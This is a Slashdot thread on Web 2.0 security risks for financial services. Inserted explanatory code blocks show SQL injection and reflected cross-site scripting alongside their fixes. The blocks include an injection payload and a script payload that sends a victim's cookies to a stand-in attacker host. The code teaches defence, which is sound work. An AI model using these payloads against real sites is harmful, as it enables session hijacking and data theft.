Security

Web 2.0 Threats and Risks for Financial Services

An anonymous reader writes "Companies are tuning into Web 2.0 but are simultaneously exposing their systems to next-generation threats such as Cross-Site Scripting, Cross-Site Request Forgery and application interconnection issues due to SOA. With regard to security, two dimensions are very critical for financial systems — identity and data privacy. Adopting the Web 2.0 framework may involve risks and threats against these two dimensions along with other security concerns. Ajax, Flash (RIA) and Web Services deployment is critical for Web 2.0 applications. Financial services are putting these technologies in place, most without adequate threat assessment exercises."
  • honestly... (Score:4, Insightful)

    by cosmocain ( 1060326 ) on Monday April 30, 2007 @10:30AM (#18927419)
    ...I don't need some flashy-looking online banking. I just want to transfer money from account A to account B, wonder where my money has gone, etc. Sometimes this little sentence just makes sense:

    Keep it simple. For such ordinary tasks there don't have to be great interaction schemes or whatever comes to your mind. It just has to freaking work. And it's even more secure the simple way? Well, then don't tamper with it.
  • The real problem (Score:5, Insightful)

    by CastrTroy ( 595695 ) on Monday April 30, 2007 @10:33AM (#18927465)
    The real problem is outlined right in the blurb. That problem is: "without adequate threat assessment exercises". I don't think any of these technologies are inherently any worse than any other method, but the problem is that they don't understand the technologies well enough, and aren't testing for vulnerabilities. It's just like with PHP. Sure, you can code your pages with really insecure SQL injection technologies, but there are solutions like prepared statements that make it a non-issue. What I want to know is, why are all these financial institutions jumping on the Web 2.0 bandwagon before they fully understand what they are doing? From my point of view, web 1.0 is good enough, and I don't see why everyone wants to switch so fast.
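    The point about prepared statements, as an added example that is not part of the comment above or of the article: the same lookup written the injectable way and the parameterised way, run against a constructed in-memory SQLite table (the account names and balances are made up for the demo). The vulnerable version splices the caller's string into the SQL text; the safe version keeps the SQL fixed and binds the value separately, so the classic `' OR '1'='1` payload is just a name that matches no row.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the bank's accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (owner TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?)",
        [("alice", 100), ("bob", 250), ("carol", 75)],
    )
    return conn

def lookup_unsafe(conn: sqlite3.Connection, owner: str) -> list:
    # Vulnerable: untrusted text is spliced into the SQL string, so a quote
    # character in `owner` ends the literal and the rest is parsed as SQL.
    sql = "SELECT owner, balance FROM accounts WHERE owner = '%s'" % owner
    return conn.execute(sql).fetchall()

def lookup_safe(conn: sqlite3.Connection, owner: str) -> list:
    # Prepared/parameterised statement: the SQL text never changes; the
    # driver sends `owner` as a bound value that is compared, not parsed.
    sql = "SELECT owner, balance FROM accounts WHERE owner = ?"
    return conn.execute(sql, (owner,)).fetchall()

# Constructed attacker input: closes the literal and appends a tautology.
PAYLOAD = "x' OR '1'='1"

def demo() -> tuple:
    """Returns (rows from the unsafe query, rows from the safe query)."""
    conn = make_db()
    unsafe = lookup_unsafe(conn, PAYLOAD)  # every account is returned
    safe = lookup_safe(conn, PAYLOAD)      # no account has that literal name
    return len(unsafe), len(safe)

if __name__ == "__main__":
    print(demo())  # (3, 0)
```

    The unsafe query becomes `WHERE owner = 'x' OR '1'='1'`, which is true for every row; the bound query compares against the literal string `x' OR '1'='1` and returns nothing. This is the whole reason parameterised queries make injection a non-issue: the boundary between code and data is enforced by the driver, not by the programmer remembering to escape.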
  • by adrenalinerush ( 518023 ) on Monday April 30, 2007 @10:51AM (#18927611)
    Hmmm... my bank's website is still quite web 1.0, and I don't have any problem with that. I don't really see where the '2.0' technologies would improve my online banking experience enough to outweigh the potential security holes. I foresee my bank sticking with 1.0.

    Why is this even being considered?
  • Re:honestly... (Score:3, Insightful)

    by SatanicPuppy ( 611928 ) * on Monday April 30, 2007 @10:54AM (#18927657)
    With complexity comes insecurity. Nothing makes me happier than an old ATM with a limited feature set... You know it's not running Windows in the background, you know it doesn't have code interpretation vulnerabilities... It's simple, clean, and elegant.

    Likewise the web presence. Whenever I see data change without a page load it creeps me out. It may be sexy looking, but for every piece of flashy 2.0 Ajax, there is a cost in terms of security.

    Sad to say though, there are people out there who are so conditioned to the "new is better" mentality that applies to consumer goods, that they think the same applies to computer code. They view a flashy "new" site as being more secure, rather than less secure, because newer is better, right?
  • Re:honestly... (Score:3, Insightful)

    by goombah99 ( 560566 ) on Monday April 30, 2007 @10:55AM (#18927661)
    You'd think some bank could turn this into a marketing ploy. Put up a banner saying "Please excuse the sluggishness and old-fashioned style of our web site; unlike our competitors we use a transactional accounting system and everything you see on your screen is generated right on our servers. It's safer even if it isn't sexy. But you don't really want your bank to be sexy, do you?".

    Now could someone please explain to me what cross site scripting is and why it is so hard to stamp it out.
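    A worked illustration of the question above, added here and not part of the comment or of the article: reflected cross-site scripting is what happens when a page echoes a request parameter into its HTML without encoding it, so the browser parses attacker-supplied markup as part of the page. The reason it is hard to stamp out is that the correct encoding depends on where the text lands (HTML body, attribute value, URL), and one missed output point anywhere on the site is enough. The attacker string and page templates below are constructed for the demo; the attacker host name is made up.

```python
import html

# Constructed attacker input, as it would arrive in a URL parameter such as
# ?name=... on a page that greets the user by name.
PAYLOAD = ('<script>document.location="http://attacker.example/?c="'
           '+document.cookie</script>')

def render_unsafe(name: str) -> str:
    # Vulnerable: the parameter is concatenated into HTML as-is, so the
    # browser sees a real <script> element and runs it in the bank's origin.
    return "<p>Hello, %s</p>" % name

def render_body_safe(name: str) -> str:
    # HTML-body context: &, <, >, " and ' become entities, so the browser
    # displays the attacker's text instead of executing it.
    return "<p>Hello, %s</p>" % html.escape(name, quote=True)

def render_attr_safe(name: str) -> str:
    # Attribute context: escape the quotes AND keep the attribute quoted;
    # an unquoted attribute could still be broken out of with a space.
    return '<input name="user" value="%s">' % html.escape(name, quote=True)

def render_href_safe(next_url: str) -> str:
    # URL context: entity-encoding alone is not enough, because
    # javascript: is a syntactically valid href that executes code.
    # Allow only relative or https URLs before embedding.
    if not next_url.startswith(("/", "https://")):
        next_url = "/"
    return '<a href="%s">continue</a>' % html.escape(next_url, quote=True)

def contains_script(markup: str) -> bool:
    """True if the rendered markup still carries a parseable <script> tag."""
    return "<script" in markup.lower()

if __name__ == "__main__":
    print(contains_script(render_unsafe(PAYLOAD)))      # True
    print(contains_script(render_body_safe(PAYLOAD)))   # False
    print(render_href_safe("javascript:alert(1)"))      # <a href="/">continue</a>
```

    Three different encoders for three contexts is the practical answer to "why is it so hard": a template engine that escapes the body by default still leaves attribute and URL sinks to the developer, and a site with hundreds of pages has hundreds of places to get one wrong.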
  • by rs232 ( 849320 ) on Monday April 30, 2007 @10:58AM (#18927693)
    Shouldn't security be built into these Web 2.0 applications from the ground up and not added on as an afterthought?
  • by NickFitz ( 5849 ) on Monday April 30, 2007 @10:58AM (#18927697)

    The real problem with TFA becomes apparent at the start of the second page:

    RSS feeds exist in Web 2.0 data format.

    That sentence alone confirmed what I'd been beginning to suspect by the end of the first paragraph: TFA is a mishmash of ill-informed technobabble penned for the purpose of allowing underqualified CTOs to give the impression that they are fully buzzword-compliant.

  • by Opportunist ( 166417 ) on Monday April 30, 2007 @11:13AM (#18927865)
    Has it ever been that way?

    I was there when a certain bank that better remains anonymous (not because of being innocent, but because they got more & better lawyers than me) jumped the train for online business. All the managers saw how much work could be put onto the customers and how much we can save by not having people come in and actually talk to the teller or drop transfer orders in our boxes. They'd do all themselves! And we can charge them for that! Good God, we need that! No matter the cost! Security? Aw heck, ignore that, who'd dare to attack a bank here (Seriously, that was actually the attitude towards it)? And even, what could go wrong? We got https, we got security certificates, our servers are kept tight by the best people money can buy...

    The average annual damage for actual physical bank robberies is a tiny fraction by now of what online frauds cause. Especially since you get about 90-95% of the guys that come with a gun to your bank, while 90-95% of those coming online slip past you.

    And now everyone's all over security and everyone wants it secure damn right now or else.... But you can't secure something that is inherently insecure. It was designed insecurely, it was created insecurely, it's run insecurely. Yes, the key attack point is the customer, not the bank, but all in all, the damage rests on the banks. Either they pay the damage, or they don't and word gets out, and everyone will stop using online banking. THAT damage, though, would be even higher!

    So take my word for it, nobody will give a rat's rear about security until it's too late. Why should it be different this time?
